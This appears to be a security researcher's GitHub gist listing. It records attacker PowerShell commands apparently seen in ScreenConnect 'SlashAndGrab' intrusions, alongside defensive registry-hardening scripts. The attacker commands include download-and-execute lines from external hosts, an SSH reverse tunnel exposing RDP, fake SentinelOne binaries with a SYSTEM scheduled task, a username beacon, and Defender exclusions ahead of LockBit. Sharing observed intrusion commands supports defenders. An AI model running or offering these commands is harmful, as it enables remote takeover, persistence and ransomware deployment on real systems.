Dray Agha Purp1eW0lf
Purp1eW0lf
/ SlashAndGrab_SSH_download.ps1
Created
February 23, 2024 16:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell.exe -c "$p = 9595; iwr -UseBasicParsing aqua[.]oops[.]wtf/d | iex |
Purp1eW0lf
/ SlashAndGrab_chrome_remote.ps1
Created
February 23, 2024 16:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Download from Google | |
| powershell -c (New-Object System.Net.WebClient).DownloadFile('https://dl.google.com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi', $env:ProgramData+'\\1.msi') | |
| # Install | |
| msiexec /i C:\\ProgramData\\1.msi |
Purp1eW0lf
/ SlashAndGrab_SSH.ps1
Created
February 23, 2024 16:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Script that initiated SSH | |
| $r = "C:\ssh\" | |
| $e = $r + "ssh.exe" | |
| $g = "aqua.oops.wtf" | |
| If (!(Test-Path $e)) { | |
| md $r > $null | |
| iwr -Uri ($g + "/z") -o ($r + "z.zip") | |
| Expand-Archive ($r + "z.zip") -d $r | |
| } | |
| $args = @("tunnel@" + $g,"-Z lollersk8","-R " + $p + ":localhost:3389","-p 443", "-N","-oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null") |
Purp1eW0lf
/ SlashAndGrab_name_senui.ps1
Created
February 23, 2024 16:21
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell wget -uri http://185[.]232[.]92[.]32:8888/SentinelUI.exe -OutFile C:\\Windows\\Help\\Help\\SentinelUI.exe; | |
| wget -uri http://185[.]232[.]92[.]32:8888/Logs.txt -OutFile C:\\Windows\\Help\\Help\\Logs.txt; | |
| wget -uri http://185[.]232[.]92[.]32:8888/SentinelAgentCore.dll -OutFile C:\\Windows\\Help\\Help\\SentinelAgentCore.dll; | |
| cmd /c C:\\Windows\\Help\\Help\\SentinelUI.exe; | |
| SCHTASKS /Create /TN \\Microsoft\\Windows\\Wininet\\UserCache_1708535250863 /TR \"C:\\Windows\\Help\\Help\\SentinelUI.exe\" /RU SYSTEM /SC ONSTART /RL HIGHEST /NP /F /DELAY 0000:05 |
Purp1eW0lf
/ SlashAndGrab_name_enum.ps1
Created
February 23, 2024 16:20
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell.exe Invoke-WebRequest -Uri http[:]//108.61.210.72/MyUserName_$env:UserName |
Purp1eW0lf
/ SlashAndGrab_certutil.ps1
Created
February 23, 2024 16:20
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| certutil -urlcache -f http[:]//23.26.137[.]225:8084/msappdata.msi c:\mpyutd.msi |
Purp1eW0lf
/ SlashAndGrab_lockbit.ps1
Created
February 23, 2024 16:18
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Ransomware binaries | |
| C:\\Windows\\TEMP\\ScreenConnect\\22.5.7881.8171\\LB3.exe\ | |
| #Defense evasion | |
| powershell -c foreach ($disk in Get-WmiObject Win32_Logicaldisk){Add-MpPreference -ExclusionPath $disk.deviceid} |
Purp1eW0lf
/ Deny_MOTW_Files.ps1
Created
March 15, 2023 20:02
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #run as Administrator, copy/paste the below | |
| # Mount HKU | |
| mount -PSProvider Registry -Name HKU -Root HKEY_USERS; | |
| # Loop through each HKU/user's HKCU, loop though each Office version and application, and implement defences | |
| (gci -path "HKU:\*\Software\Microsoft\Office\*\*\Security\").PsPath | | |
| Foreach-Object {Set-ItemProperty -path $_ -name "blockcontentexecutionfrominternet" -value 1 -Type DWord -verbose} |
Purp1eW0lf
/ Deny_Mounting.ps1
Created
March 15, 2023 20:01
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #run as Administrator, copy/paste the below | |
| New-ItemProperty -Path "HKLM:\SOFTWARE\Classes\Windows.IsoFile\shell\mount" -Name "ProgrammaticAccessOnly" -type string -verbose; | |
| New-ItemProperty -Path "HKLM:\SOFTWARE\Classes\Windows.VhdFile\shell\mount" -Name "ProgrammaticAccessOnly" -type string -verbose |
Purp1eW0lf
/ Deny_OneNote_Malware.ps1
Created
March 15, 2023 20:00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Run as Administrator, copy/paste the below | |
| # Mount HKU | |
| mount -PSProvider Registry -Name HKU -Root HKEY_USERS; | |
| # Loop through each HKU/user's HKCU, AND deploy OneNote defences | |
| (gci -path "HKU:\*\Software\Microsoft\Office\*\OneNote\Options\").PsPath | | |
| Foreach-Object {New-ItemProperty -Path $_ -Name "disableembeddedfiles" -Value 1 -type DWORD -verbose}; | |
| (gci -path "HKU:\*\Software\Microsoft\Office\*\OneNote\Options\").PsPath | |